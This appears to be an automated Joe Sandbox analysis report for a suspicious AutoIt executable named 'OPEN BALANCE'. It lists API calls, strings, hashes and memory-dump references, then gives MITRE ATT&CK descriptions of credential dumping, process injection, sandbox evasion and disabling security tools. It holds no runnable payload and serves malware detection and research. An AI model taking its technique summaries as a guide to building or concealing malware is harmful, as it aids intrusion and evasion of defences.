Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: b38be620e29398dccb65bce030b3d6fe36db0d4ac73f6726cad540e5ca6cc06e
Instruction ID: a395ffc97755ef6ad9c7d651e77a88e020465b7e6adeb7d98c8c7d9cf5592cd7
Opcode Fuzzy Hash: b38be620e29398dccb65bce030b3d6fe36db0d4ac73f6726cad540e5ca6cc06e
Instruction Fuzzy Hash: 00113AB261060AAFDF00DFA8CC46EFA7BB8FB08354F004626F955E2250E735E851DB61

Function 008BCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008BCD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008BCDA6

Strings

<local>, xrefs: 008BCD66

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: d08b827e612cb9a62ae7f4cf9d467cf6030ef7d05de9e2f7a2d56b545dda86c5
Instruction ID: 557510ee778827e38b9d67961816f87d4eb3020ff1801ecd106bcf65130184dd
Opcode Fuzzy Hash: d08b827e612cb9a62ae7f4cf9d467cf6030ef7d05de9e2f7a2d56b545dda86c5
Instruction Fuzzy Hash: D011C279245636BED7384B668C49EE7BEACFF527A8F44422AB149C3280D7709840D6F0

Function 008D3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 008D34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008D34BA

Strings

edit, xrefs: 008D348F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 888416d85954dcc2ff85529553ff9f2d5744bc926677ffd37055d4b9277aced3
Instruction ID: f776ba0ec43f4d6c4874987c7af01530911b37a9852918ff0c2c893c2b8faaab
Opcode Fuzzy Hash: 888416d85954dcc2ff85529553ff9f2d5744bc926677ffd37055d4b9277aced3
Instruction Fuzzy Hash: 86118F71100108AFEF114E64EC44AEB376AFB25378F504326F961D32D0C779DD51975A

Function 008A6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

CharUpperBuffW.USER32(?,?,?), ref: 008A6CB6
_wcslen.LIBCMT ref: 008A6CC2

Strings

STOP, xrefs: 008A6CBC, 008A6CC1

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 9ee6b360aceee4fbb96ab34a3386111cb7eb80c6e67e8c69a921796f092b1fa7
Instruction ID: 058df42fb5b303f4c76546b2a287ed39714ffa3cbd7c83081336d04157670c48
Opcode Fuzzy Hash: 9ee6b360aceee4fbb96ab34a3386111cb7eb80c6e67e8c69a921796f092b1fa7
Instruction Fuzzy Hash: 73010432A0052B8BEB209FBDDC809BF37A4FF627607050528E962D6199FA36D920C650

Function 008A1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

Part of subcall function 008A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 008A3CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008A1D4C

Strings

ListBox, xrefs: 008A1D16
ComboBox, xrefs: 008A1CEB

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 1e952d06646a3b6a79a804bdb4941d08a42fd7f065a7e754d66e1308bf351ac9
Instruction ID: 3d2efe3edf6018798d425d66b53ca9af82ef4684207097dc48f9753db677d9db
Opcode Fuzzy Hash: 1e952d06646a3b6a79a804bdb4941d08a42fd7f065a7e754d66e1308bf351ac9
Instruction Fuzzy Hash: 1001D875641218ABDF14EBA8DC55CFF7768FB57350F040619F872D76C1EA305908C661

Function 008A1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

Part of subcall function 008A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 008A3CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 008A1C46

Strings

ListBox, xrefs: 008A1C10
ComboBox, xrefs: 008A1BE5

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 9aa9c737b63581b39cae6a32c9c828495cc01feef475c9dbafdfa6e593be8142
Instruction ID: c663a63a1fc9c8bf53141cd18d234ff16a76085c7e700e62f7b0004571e514b4
Opcode Fuzzy Hash: 9aa9c737b63581b39cae6a32c9c828495cc01feef475c9dbafdfa6e593be8142
Instruction Fuzzy Hash: 2001A775AC11086BDF14EB94DD559FF77A8FB62350F140019F446E76C2EA209F08D6B2

Function 008A1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

Part of subcall function 008A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 008A3CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 008A1CC8

Strings

ListBox, xrefs: 008A1C94
ComboBox, xrefs: 008A1C69

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 2b10c7b73cb1269a6d203cb812afabca6acaff457a6cb5ec665335c5c66de2f4
Instruction ID: bdadd937c535bf7d16a91142d1fb94492681899b508ee9716464314a45238e58
Opcode Fuzzy Hash: 2b10c7b73cb1269a6d203cb812afabca6acaff457a6cb5ec665335c5c66de2f4
Instruction Fuzzy Hash: 06018B75A8111C67DF24E798DE55AFF77A8FB12350F140015F841F3681EA619F08C6B2

Function 008C747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008C7493
_wcslen.LIBCMT ref: 008C74B9

Strings

3, 3, 16, 1, xrefs: 008C7483

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 7f5a20c5f3115178b14133a6d4517d9116067fec42d234731f625f3628e632bc
Instruction ID: a364220bd03ffd17031e22a1b2e10db20cd67d7f6b345ef57f314b9c68f230c1
Opcode Fuzzy Hash: 7f5a20c5f3115178b14133a6d4517d9116067fec42d234731f625f3628e632bc
Instruction Fuzzy Hash: 03E02B0264462014A235127DACC1F7F5A9EFFC5760710282FF981C227AEAA4CD9193A6

Function 008A0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008A0B23

Strings

AutoIt, xrefs: 008A0B17
Error allocating memory., xrefs: 008A0B1C

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: dd17c19a16706a7a282d3b3a1ccb24541dd1b30cc08790aee56168857f70992d
Instruction ID: fcb17b2638968ca4287348f33b512f16cf300de4316de79687f2495e278934d3
Opcode Fuzzy Hash: dd17c19a16706a7a282d3b3a1ccb24541dd1b30cc08790aee56168857f70992d
Instruction Fuzzy Hash: ADE048312853197AD2143798BC03F897B94FF05B65F100527FB98D55C38AD2645496AA

Function 00860D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0085F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(00910A88,00000000,00910A74,00860D71,?,?,?,0084100A), ref: 0085F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0084100A), ref: 00860D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0084100A), ref: 00860D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00860D7F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: da87801f2956f238a0591080a2571fcd9cdcd05b0df62d2b3e2e1febda1d64e1
Instruction ID: e40891db0d0777cb5ec613dfa7170230844f54a014234526a3e898deb31e660e
Opcode Fuzzy Hash: da87801f2956f238a0591080a2571fcd9cdcd05b0df62d2b3e2e1febda1d64e1
Instruction Fuzzy Hash: 6AE039702007428BD3209FA8E4042467BE4FB04745F018B2EE692CA756DBB4E448DF91

Function 0089D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0089D220

Strings

X64, xrefs: 0089D2A8
%.3d, xrefs: 0089D22B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: b5e6dffbc8586cab7ab8452c2f142463f7835da2f14ed18743712d86b24506d5
Instruction ID: fba2082f4a35c8fb58982994158a8bd1b6b73c780db204f4dae7cc85c1ed3eaf
Opcode Fuzzy Hash: b5e6dffbc8586cab7ab8452c2f142463f7835da2f14ed18743712d86b24506d5
Instruction Fuzzy Hash: 73D01261C0930DE9CF50A7D0DC458B9B3BCFB18305F948452FD06D1081D624E508A766

Function 008D2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008D232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008D233F

Part of subcall function 008AE97B: Sleep.KERNEL32 ref: 008AE9F3

Strings

Shell_TrayWnd, xrefs: 008D2325

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: eaf8ba568fc1b110f96616a167417c0c2be2e51b64d6cc626b06a5e0677a03a9
Instruction ID: c99425c58d51c86913a1ae9e2326c0baf859a68ae083f78aa5b6b24af71c8bb3
Opcode Fuzzy Hash: eaf8ba568fc1b110f96616a167417c0c2be2e51b64d6cc626b06a5e0677a03a9
Instruction Fuzzy Hash: CCD0C936395311BAEAA4A770AC4FFC67B58BB50B14F004A1AB645AA1D0CAA0A801CA54

Function 008D2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008D236C
PostMessageW.USER32(00000000), ref: 008D2373

Part of subcall function 008AE97B: Sleep.KERNEL32 ref: 008AE9F3

Strings

Shell_TrayWnd, xrefs: 008D2365

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 72f2b55fdc164e8033e2220bf1622ad76173629d07150b17ec4e0c7929947dea
Instruction ID: e5849dd23812b10fc0c5f9557cf8d055910362303c1547c05b4e130db5fe21c1
Opcode Fuzzy Hash: 72f2b55fdc164e8033e2220bf1622ad76173629d07150b17ec4e0c7929947dea
Instruction Fuzzy Hash: 7AD0C9323823117AEAA4A770AC4FFC67B58BB55B14F004A1AB645EA1D0CAA0A801CA54

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

